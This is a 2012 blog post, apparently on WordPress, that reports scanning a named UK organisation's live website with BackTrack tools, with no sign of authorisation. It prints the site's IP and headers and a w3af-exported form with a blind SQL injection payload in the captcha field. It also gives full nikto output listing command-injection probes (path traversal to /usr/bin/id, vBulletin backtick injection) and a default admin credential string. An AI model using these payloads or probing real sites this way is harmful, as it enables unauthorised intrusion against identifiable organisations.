Vulnerability found in http://nnc.co.uk

Posted: September 11, 2012 in Uncategorized

Info first

root@bt:/pentest/enumeration/web/whatweb# ./whatweb ncc.c
http://ncc.co.uk [200] Cookies[ncc], Email[info@ncc.co.uk], Google-Analytics[UA-11579552-1], Title[National Computing Centre  | Home], PHP[5.2.17], JQuery, X-Powered-By[PHP/5.2.17], Country[UNITED KINGDOM][GB], Apache, HTTPServer[Apache], IP[88.98.24.202]

Index.php Header contains a expireiry date that has long been and gone:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 11 Sep 2012 03:02:58 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en" />
<script type="text/javascript"> var url_address = "http://ncc.co.uk/"; </script>

Blindsqli in captcha!

During a few scans with backtrack, heres a vulnerability I found it their site, This first one sits on http://ncc.co.uk/index.php/index.php in the captcha token

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>Exported HTTP Request from W3AF</title>
    </head>
    <body><form action="
http://ncc.co.uk/index.php" method="POST">
<label>
website</label>
<input type="text" name="website" value="
http://w3af.sf.net/">
<label>comment</label>
<input type="text" name="comment" value="Hi hunny I’m home">
<label>firstname</label>
<input type="text" name="firstname" value="John">
<label>lastname</label>
<input type="text" name="lastname" value="Smith">
<label>company</label>
<input type="text" name="company" value="Bonsai">
<label>telephone</label>
<input type="text" name="telephone" value="55550178">
<label>captcha</label>
<input type="text" name="captcha" value="84" OR "84"="84">
<label>postcode</label>
<input type="text" name="postcode" value="55550178">
<label>address</label>
<input type="text" name="address" value="Bonsai Street 123">
<label>Accreditation_4_action</label>
<input type="text" name="Accreditation_4_action" value="submit">
<label>form</label>
<input type="text" name="form" value="4">
<label>title</label>
<input type="text" name="title" value="">
<label>jobtitle</label>
<input type="text" name="jobtitle" value="Hunter">
<label>email</label>
<input type="text" name="email" value="w3af@techsupportbase.net">
<label>mode</label>
<input type="text" name="mode" value="56">
<label>captcha_token</label>
<input type="text" name="captcha_token" value="4e49734857717649364c72367738453d">
<label>page</label>
<input type="text" name="page" value="689">
<input type="submit">
</form>
</body>
</html>

19 Items found, to be suspected vulnerabilities

root@bt:/pentest/web/nikto# ./nikto.pl -h http://ncc.co.uk
– Nikto v2.1.5
—————————————————————————
+ Target IP:          88.98.24.202
+ Target Hostname:    ncc.co.uk
+ Target Port:        80
+ Start Time:         2012-09-10 21:17:29 (GMT-4)
—————————————————————————
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ robots.txt contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /certificates: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string ‘admin:aaLR8vE.jjhss:root@127.0.0.1’, password file location ‘ans_data/ans.passwd’
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
+ End Time:           2012-09-10 22:14:47 (GMT-4) (3438 seconds)
—————————————————————————
+ 1 host(s) tested

Screenshot

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s